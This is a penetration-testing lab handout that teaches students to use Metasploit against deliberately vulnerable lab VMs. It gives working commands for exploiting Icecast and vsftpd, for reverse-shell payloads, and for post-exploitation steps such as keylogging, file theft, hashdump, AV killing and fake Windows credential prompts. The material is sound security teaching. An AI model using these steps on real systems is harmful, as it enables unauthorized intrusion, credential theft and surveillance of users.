Lab: Exploitation

By Drs. Dave Eargle and Anthony Vance

This lab uses the following VMs:
  • Kali
  • Windows
  • Metasploitable2

In this lab, you will use Metasploit to exploit and take control of a Windows VM and the Metasploitable2 VM you scanned in the previous lab.

Metasploit

Metasploit is the industry’s most popular exploitation tool. According to Sectools.org:

Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.

Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).

Metasploit Interfaces

The Metasploit framework has a variety of different interfaces, including the command line tool mcli and meterpreter, an interface designed to interact with compromised computers. You can even work from an interactive Ruby programming language interpreter within Metasploit (Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is msfconsole. Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.

Terminology

Below is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester’s Guide, by Kennedy et al.

Exploit
The means by which an attacker takes advantage of a flaw within a system, an application or service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors.
Payload
Code that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Module
A module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.
Listener
A component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Common Commands within Msfconsole

help Lists available commands.
show exploits Shows all available exploits in the Metasploit framework. New exploits are constantly being developed and incorporated into the framework.
show auxiliary Shows auxiliary modules within Metasploit framework.
search Searches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.
use [module] Loads a Metasploit module. The back command exits the module.
back Exits the current module.
show options Within a particular module, show options displays the required and optional configurations that the module uses.
show payloads Within a module, show payloads displays all the payloads that are available to use with the module.
show targets Within a module, list targets shows OS versions that are vulnerable to the module.
info Within a module, info shows additional information about the module.
set/unset Sets an environment variable used as an option specific to a particular module.
setg/unsetg Sets a global environment variable used as an option that applies across modules.
save Saves the current global options so they are available the next time you run msfconsole.

Part 1: Exploit Windows via Icecast Vulnerability

In this lab, imagine that the Windows VM is a machine that you desire to exploit. The Windows user is operated by a person named Labuser, who has installed a media streaming server, Icecast, so that he and his coworkers can listen to his music. Unfortunately, the version of Icecast that Labuser has installed is vulnerable to a buffer overflow attack, to which all versions of Icecast version 2.01 and earlier were vulnerable. See the exploit information here. Old versions of Icecast can be found here.

Also unfortunately, Labuser has completely disabled every single known security feature of his operating system, including but not limited to:

  • Windows Defender
  • Windows Firewall
  • Buffer overflow protection

For this section of the lab, you will play both the role of the Windows user, and also of a nefarious attacker.

Start Icecast as admin

  1. Launch the Windows virtual machine. Log in to it as user Labuser, password Passw0rd!.

    If you are asked to provide a reason for an unexpected shutdown, you can ignore (cancel) this dialog. It is a Windows Server logging feature.

  2. On Windows desktop, right-click the “Icecast2 Win32” icon. Important! Select “Run as administrator.” If any warning message pops up, click “yes”.

    Running as Administrator will change the permissions that are obtained when the program is exploited.

  3. In the Icecast window that appears, click the button “Start server.”

    Note: The Icecast server is configured by default to a max of 5 connections. Each time you exploit the Icecast server, the connection count will tick up by one. If you use up all connections, simply kill and restart the Icecast server.

Start msfconsole

In Kali, from a terminal, enter:

msfconsole

You should see a “msf >” prompt appear. This is the Metasploit command line.

nmap Scan Windows

Scan the Windows VM for vulnerabilities using nmap

nmap -sV <ip of Windows>

Notice that Icecast is running on port 8000. Could there be an exploit for Icecast built into Metasploit? Let’s check!

Finding and using an icecast exploit

  1. From the msf > prompt, try:

    search name:icecast
    
  2. In the search output, you should see an exploit related to icecast called exploit/windows/http/icecast_header. Use it:

    use exploit/windows/http/icecast_header
    
    Note: You can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice it should show you all possible options for directory you are in.
  3. Your msfconsole prompt should now look like this:

    msf exploit(icecast_header) >
    

    Indicating that the icecast_header module is loaded.

  4. To get more information about this exploit module, type info.

    This module has been rated “great,” meaning it is very effective and reliable.

    Besides providing a better description, the info command shows the targets that the module is effective against, as well as options to set.

  5. To show available options, type show options.

    Notice that some options are “required.”

  6. Let’s set the required options.

    First, we’ll set the remote host:

    set rhost <IP address of your Windows VM>
    

    Type show options again to verify that the RHOST variable has been set.

  7. Next, let’s look at available payloads for this exploit:

    show payloads
    
  8. We have a lot of payload options for this module. We’ll use one of the most popular and reliable payloads – a Meterpreter shell. Type:

    set payload windows/meterpreter/reverse_tcp
    

    Meterpreter is a shell, like Bash, except it is malware.

    This specific payload will open a reverse TCP connection, from the exploited Windows VM back to the Kali VM, effectively punching through most external-facing firewalls. Often, firewalls defend more fiercely what comes in than what goes out. This is why it is important that you are able to reach Kali from Windows, and Windows from Kali.

  9. Type show options again to see the options that are required for this payload.

  10. Set the “local host” variable to Kali’s IP address on the infosec-net adapter. To set the local host variable, type

    set lhost <IP address of the Kali machine>
    

    A lhost was likely set for you by default – but it may be an address for an incorrect interface! Make sure this setting is correct.

    Note: Remember that you can easily check your IP in Unix/Linux by typing ifconfig or ip from within Metasploit.

    Note! msfconsole allows you to specify an interface name as the lhost. The interface name for infosec-net is virbr1. You could set this as follows:

    set lhost virbr1
    

    Type show options to see that the variable has been set.

  11. For convenience, set values for some of these settings to the global msfconsole datastore using the setg command. For example (verify addresses!):

    setg RHOST 192.168.56.100
    setg RHOSTS 192.168.56.100
    setg LHOST 192.168.56.101
    

    Then, run the msfconsole save command to have these values loaded for new msfconsole sessions.

    You should still verify that settings are correct before run-ing any exploits. Not all modules will draw from the global datastore.

  12. With all options set, now it’s time to launch the exploit! Type:

    exploit
    

    (Or equivalently, run, but that’s less fun.)

  13. You should now be presented with the meterpreter > prompt. If you see this, then congratulations! You’ve exploited your first remote host.

  14. Laugh maniacally.

For reference, here is a summary of the msfconsole commands you just ran. These commands assume that you’ve run the above setg commands.

use exploit/windows/http/icecast_header
set payload windows/meterpreter/reverse_tcp
exploit

Part 1.2: Use Meterpreter to Explore the Windows host

Now, let’s explore your newfound power. You are operating malware – meterpreter – that is running on a remote, compromised host. Run a few commands to give an idea of the power of the meterpreter interface.

  1. To see all possible Meterpreter commands, type help.
  2. Don’t do this now, but you can close a meterpreter session with the exit command. Alternatively, you can suspend your session so you can return to it again later with the background command (or by pressing ctrl+z).
  3. Type sysinfo to see information about the compromised system.
  4. Type getuid to see which Windows user account your session is running as.

    You will see that you are running as Labuser. But you want more power. You want to become SYSTEM – the windows equivalent of the *nix “root” user.

    Because Icecast was “run as administrator”, we can easily become SYSTEM – the Windows equivalent of “root”. Escalate your privileges by typing getsystem.

    Type getuid again. You should see that you have “NT AUTHORITY\SYSTEM,” which means you administrator privileges.

    Now that you are SYSTEM, laugh again.

The following are non-sequential exploration activities you might carry out. You should be able to try them in any order.

Kill AV

With a Meterpreter shell, you have access to a trove of post-exploit modules included in the Metasploit framework that you can run on the victim machine. For instance, type:

run post/windows/manage/killav

to stop anti-virus processes that might limit our attacks on the machine.

(There are none running on this virtual machine.)

Screenshot

Type screenshot to capture a screenshot of the current GUI. A jpeg file should be saved to /root on your Kali machine. You can view the image from a different shell in Kali by navigating to the directory of the stored image and viewing it with mirage [image name].

VNC payload

Control the Windows GUI.

Heads up! The VNC payload is unreliable. See the troubleshooting note at the bottom of this section.

From meterpreter, type background or cntl+z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.

For this, we will use a different payload – the vncinject payload.

set payload windows/vncinject/bind_tcp

Type show options. Change the “ViewOnly” option to false

set ViewOnly false

Run exploit anew.

A new window should open on Kali Linux that will let you control the Windows VM using the mouse. You are now controlling the Windows user interface! Whatever you do, the logged-in user will see! Trying moving a window on the Windows VM. Then, close the VNC window on the Kali VM. Because you closed the VNC window, the exploit terminated.

Once you are done playing with VNC access, switch back to a meterpreter session. From msfconsole, run sessions -l to view all running connections. You should see a list of your sessions, including your meterpreter session, along with its id. Interact with that session again by running sessions <the id of the session>. Your prompt should change, and you should be engaged with the meterpreter session again.

Heads up!

This exploit, while fun, is not very reliable.

If it doesn't work for you, then try changing the VNCPORT to something besides 5900 (perhaps 5901?). There might be left-over services listening on kali on these ports, so just try a different one. Failing that, try things like the following:

  1. "Stop"-ing and "start"-ing again the Icecast server
  2. Restarting your msfconsole session
  3. Trying the tcp_bind variant, etc.

It's not a big deal if you can't get this to work -- feel free to skip it. In fact, it's good practice dealing with the uncertainty and frustration of exploits not always working. After all, this is malware we're using here! No guarantees!

Keylogger

Start a keylogger on the victim’s computer. Type keyscan_start. Now, from the Windows machine, open Notepad.exe and type some secrets. They are no longer secrets.

Back in meterpreter, type keyscan_dump. You should see the text you typed in Notepad. To stop the keylogger, type keyscan_stop.

Steal files

Steal a file—download a file from Windows to Kali.

As the Labuser, use Notepad to create a text document on the Desktop of the Windows machine. Put some secrets in it.

From the meterpreter session, use the cd command within Meterpreter to navigate to the victim desktop. For that, you can either use the Windows path specification, with double back-slashes:

cd c:\\users\\Labuser\\desktop

… or you can use linux path specification:

cd /Users/Labuser/desktop

Now type ls to see what you might pilfer.

Snag the secrets file.

download [filename to steal]

The file should now be pilfered, saved to the Kali VM at /root.

You can also use the search command from within meterpreter to find the location of the secrets file:

search -f [name of your secrets file].txt

Annoy the user

Rather than steal secrets, let’s switch to pestering Labuser.

First, from meterpreter, disable their keyboard and mouse:

uictl disable all

Then, play a video for them. We’ll use the play_youtube post module. Read about it from within meterpreter:

info post/multi/manage/play_youtube

The default youtube video set for this postmodule is excellent, but you can optionally swap it out for one of your choosing. From your laptop or whatever, select your favorite annoying youtube video. Note the url of the video – it will include a v=[video id] in it. Copy the video id. For example, one video id is DLzxrzFCyOs. Let’s play this video, setting VID to your video. e.g.:

run post/multi/manage/play_youtube VID=DLzxrzFCyOs

Switch over to the Windows VM and enjoy being annoyed by the video. Close the video –oh wait you can’t, your keyboard and UI access were disabled! You are powerless!

As the attacker, let up on your shenanigans. From meterpreter, reenable ui controls:

uictl enable all

Pop-up says "Video not available"?The documentation for this postmodule says the following: "Enabling the EMBED option will play the video in full screen mode through a clean interface but is not compatible with all videos." Try disabling EMBED by calling the module like this:

run post/multi/manage/play_youtube VID=DLzxrzFCyOs EMBED=false

Steal hashes

Back to secret-stealing.

Because you getsystem‘ed earlier, you can obtain the password hashes for the machine by typing run post/windows/gather/hashdump. These hashes can be readily cracked using a password cracker like Hashcat or John the Ripper (covered in the password cracking lab). For now, we’ll use Google to crack the password hash for user vagrant.

Note: hashdump command outputs hashes in the following format:

username:SID:LANMAN hash:<NTLM hash>:::

For example, in the following hashdump, the NTLM hash is C1F1B7BDB01896908C80A0A67062BF24:

Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::

Copy the NTLM hash that you obtain from hashdump for the Vagrant user. Open a web browser, and visit a site like https://crackstation.net or https://hashkiller.co.uk, and let it crank on your hash. These sites use rainbow tables to quickly look up corresponding plaintext password for a submitted hash.

Alternatively, try to crack it on your own using hashcat with -m 1000 (NTLM) and a wordlist like rockyou. Go on, it’s fun!

Question : What is the NTLM hash of the user vagrant?

Migrate processes

Right now, your meterpreter sessions is tied to the Icecast process. This means that if Icecast is closed, you lose your shell. Let’s mitigate that threat by migrating to another, more permanent Windows process that is at less risk of being closed down.

Type ps -S Icecast (note the capital ‘S’ argument and the capital ‘I’ in Icecast) to search for processes with the name of “Icecast.” Note the process ID. Next, type getpid to get the process that meterpreter is running off of. It should be the same process ID as Icecast. This confirms that you are tied to Icecast.

Now, run this post module, which by default will spawn a hidden notepad.exe process, and migrate you to it:

run post/windows/manage/migrate

Now, close the Icecast window. Your meterpreter session should still be running. Congratulations, you have Persisted.

Steal chrome saved passwords

Sorry, closed for maintenance. This section used to have you steal passwords from Chrome's secure storage, but in March 2020, Chrome changed the way that their passwords are encrypted, and the metasploit enum_chrome postmodule has not yet been updated, so this attack won't work.

Open Windows command prompt

You can execute commands on the victims host from within Meterpreter. For example, type:

execute -f cmd.exe -c

This will launch cmd.exe on the victim’s machine. You can hide the command window from being shown on the victim machine by using the -H option.

The -c option “channelizes” the cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that “Channel 1 was created.”

Interact with cmd.exe by typing: channel -i 1. Use the dir, cd, and cd .. commands to browse around the file system. Type exit to return to meterpreter.

Since opening a command prompt is such a common action, you can simply type shell to open a hidden command prompt.

Phish windows login credentials

Fake-prompt the Windows user for their password. From meterpreter, type:

run post/windows/gather/phish_windows_credentials

On Windows, you should see a legitimate Windows prompt, triggered by PowerShell code run by meterpreter on the victim machine, asking for the user to enter their password. This prompt will not go away until the user enters their correct password. Enter the password.

On Kali, in meterpreter, you should see the harvested username and password.

Question : Submit a screenshot showing you running the phish_windows_credentials postmodule, the harvested username and password, then dropping into a shell and echoing your name and the current date (see example screenshot below)

Part 2: Metasploitable2 Discovery

The Windows machine sufficiently pwned, it is now time to turn our attention to pwning Metasploitable2.

Take Note! This section attacks Metasploitable2, not the Windows machine! As such, it can be done completely independently of Part 1. You do not need to have exploited Windows to do these steps.
Heads up! This section is intentionally vague at points, for the sake of your learning. It presumes that you have already learned the specifics of certain steps from the Windows exploitation section of this lab.

Start the Metasploitable2 VM. (You can shut down the Windows virtual machine now.)

Start with recon

Start with reconnaissance – a repeat of steps from the vulnerability scanning lab. Do a wide sweep to check which ports are open on the Metasploitable2 VM:

nmap -sS 192.168.56.102

And check versions for common ports:

nmap -sV 192.168.56.102

Versions for all ports:

nmap -sV -p1-65535 192.168.56.102

Versions for one specific port:

nmap -sV -p80 192.168.56.102

Attack a service

Picking a random service, note that the service “vsftpd” is running on port 21. Could there exist a metasploit vsftpd exploit? In Kali, from a msfconsole prompt, search for a vsftpd exploit:

search vsftpd

Yes, there is one. Select (use) the exploit, and set any necessary options (show options). Check available payloads:

show payloads

You will see that a meterpreter shell payload is not available for this exploit. Instead, only a very basic unix shell payload is available.

Run the exploit.

What follows next is maddening, but at least it is consistent.

Your first run will report that the exploit was successful but no session was established. Huh?

Run it again. The exploit will report that a listener was already found! It will connect to it, and you will get a session! But the experience is different from the Meterpreter session – with this one, you will see a final line saying something along the lines of “Command shell session opened…” followed by… nothing. Did the exploit fail? No! You have a shell, albeit a very basic one.

Heads up! Now, if you close the opened session (that's close, not background) -- you will not be able to get another session via this exploit, unless you restart Metasploitable2. Take note! :shrug:

From your basic, prompt-less shell, type id to see who you are. Type other familiar commands, such as ls, pwd, and cat [filename]. You do not have tab-completion, sadly. Although you do have a few basic metasploit-aware commands. Run:

help

Notice that you have download and upload commands. This can be useful to steal files without having to use scp. However, you cannot run Metasploit postmodules from within this kind of shell.

Let’s fix that – by upgrading this session to a meterpreter session.

  1. background your session. This will return you to the msfconsole prompt.
  2. Select (i.e., use) the following postmodule:

    use post/multi/manage/shell_to_meterpreter
    

    This command will use our first shell to upload and initiate a meterpreter shell session.

    Once you have this postmodule selected, type show options. Set the needed options, including the session number for the background session.

    Launch (run) the post-module. A new meterpreter session should be created. Find the session id of this new sessions (run sessions), and interact with it (sessions [sessionid]).

    Type help again. You now have more meta-commands available than before, including access to postmodules from the shell.

  3. Let’s hashdump metasploitable2. This will give you a list of usernames and password hashes. You could later crack these hashes on Kali.

    From your meterpreter session:

    run post/linux/gather/hashdump
    

    This will print all usernames and hashes to the console. It will also save the information to a file in the /root/.msf4/loot/ folder. Make sure you take note of the location of this file – you could crack the hashes in it with a tool like hashcat or john the ripper. View the contents of the file in a separate kali terminal by cat-ing it.

    Question : What is the salt and hash for the Postgres user? For example, the salt and hash for the msfadmin user is msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/

    You technically do not have to upgrade to a meterpreter session to run the postmodules. You can alternatively run the postmodules using the basic shell session from the msfconsole. To do so, you would select the postmodule as you would an exploit:

    use post/linux/gather/hashdump
    
    show options
    
    set session [sessionid of basic unix shell]
    

    This will execute the postmodule over the basic shell session.

Exploitation Exploration: Samba Example

Take heed! This section is intentionally even more vague than the last.

Recall that the general strategy for exploitation requires:

  1. Service enumeration and version recon
  2. Exploit identification

If you run nmap against metasploitable2, you will get a long list of running services. If you include the -sV flag, you will get some version information. However, the nmap version probes can only gain so much insight. Some services require you to use other methods to do version recon, such as connecting to the service using an app that can speak the service protocol (i.e., hexchat to connect to the IRC chat client).

You can use what you know about the running service, including its name, to search for exploits. Metasploit’s built-in search functionality is a bit cumbersome and obtuse, and many prefer to install exploitdb to get access to the searchsploit command, which has more intuitive search functionality and nicer reporting and which includes non-Metasploit exploits as well (any available on exploit-db.com). But you should be able to get by with the basic Metasploit search functionality with some trial-and-error and deductive reasoning.

For instance:

  • if nmap -sV reported that a service called Samba smdb 3.X - 4.X was running on ports 139 and 445, and you wanted to search for an exploit for it, you might use some of that version information as keywords in a msfconsole search:

    search sambda smdb 3.X - 4.X
    

    (Try it!)

    This only returns one result, and it is for an “auxiliary” module, not an exploit.

  • Let’s broaden our search to try to find some exploits:

    search samba
    

    This returns a lot of results! We need to filter.

  • Run search to see how we might refine our query. The help docs report that we can filter by type:<type> and also by name:<name>, where the default is to just search by keyword, where the term can appear anywhere in the exploit file.

    So, filter down to just exploits via type:exploit:

    search name:samba type:exploit
    
  • That’s still a lot of results! How can we filter them further?

    • Note that the results list the rank of these exploits (how well they work/how reliable they are).
    • Also note that looking through the exploits, we can see what “platform” (operating system) they work on. For example, “multi” in the exploit exploit/multi/samba/usermap_script means that it can work on multiple platforms. But there are quite a few that only work on specific platforms.

    Looking again at the help docs, we see that we can filter by rank:<rank> and platform:<platform>. Let’s use these filters to only show exploits for Linux machines that are ranked “excellent”:

    search name:samba rank:excellent type:exploit platform:linux
    
  • Hooray, we have narrowed our results down to a single exploit!

    Next, you would arm (use) it, configure it, run it, and so on.

Remember, attackers only need to get in once in order to proceed. Defenders have it harder in this regard.

Tip! Remember, you can always google version names along with terms like "exploit" and "msfconsole" to see what comes up.

Exploitation Exploration: On Your Own

In this section, you will exploit three of the following additional service.

Oh no! This section is a vague as they come. But there still are hints.

Now, exploit three additional services from the following list, using what you learned above.

  • 1099 | RMIRegistry
    • set srvhost to kali’s infosec-net ip address.
  • 1524 | bindshell
    • this is a backdoor shell set up on Metasploitable2, just waiting for a connection…
    • easy way, skip Metasploit and use netcat (nc)
      • Read basic docs on nc – flex your self-learning muscle!
    • Metasploit way:
      • use exploit/multi/handler
      • set payload generic/shell_bind_tcp
      • set lport 1524
      • set rhost 192.168.56.102
  • 6667 | unrealircd
    • to get the precise version number, connect to the IRC server running on metasploitable2.
      • apt install hexchat
      • run hexchat
      • Networks > Add > (name it whatever) > Edit > replace newserver/6667 with 192.168.56.102/6667
      • connect
      • precise version number will be reported by the server in the chat window
      • search msf db for an exploit for the server name/version
  • 8180 | tomcat
    • tomcat is running on port 8180
    • view by browsing to 192.168.56.102:8180
    • need manager creds 192.168.56.102:8180/manager/html
    • bruteforce tomcat manager username:password with auxiliary/scanner/http/tomcat_mgr_login
    • once you have the tomcat mgr username:password, exploit (search type:exploit name:tomcat)
    • set httpusername and httppassword
    • don’t forget to set port

Part 2 Deliverable

For each of the three additional exploits, take one screenshot showing:

  • running the exploit and obtaining a shell,
  • interacting with that shell (if not done automatically),
  • if dropped into a meterpreter session, dropping into a basic shell via the meterpreter shell command
  • running the date command (don’t worry about the date being a few days off due to metasploitable2 lagging)
  • running echo <your first and last name> command.

Example – Screenshot 1 out of 3:

This example screenshot is for Windows – But your examples all must show exploitation of Metasploitable2. Nevertheless, the example shows (1) running the exploit and getting a meterpreter shell, (2) dropping into a cmd shell, (3) running the windows equivalent of the date command, and (4) echoing a name.

You should submit three such screenshots, showing successful exploitation of Metasploitable2.

Question : Take a screenshot for each of the three successful exploits you performed, following the guidelines above.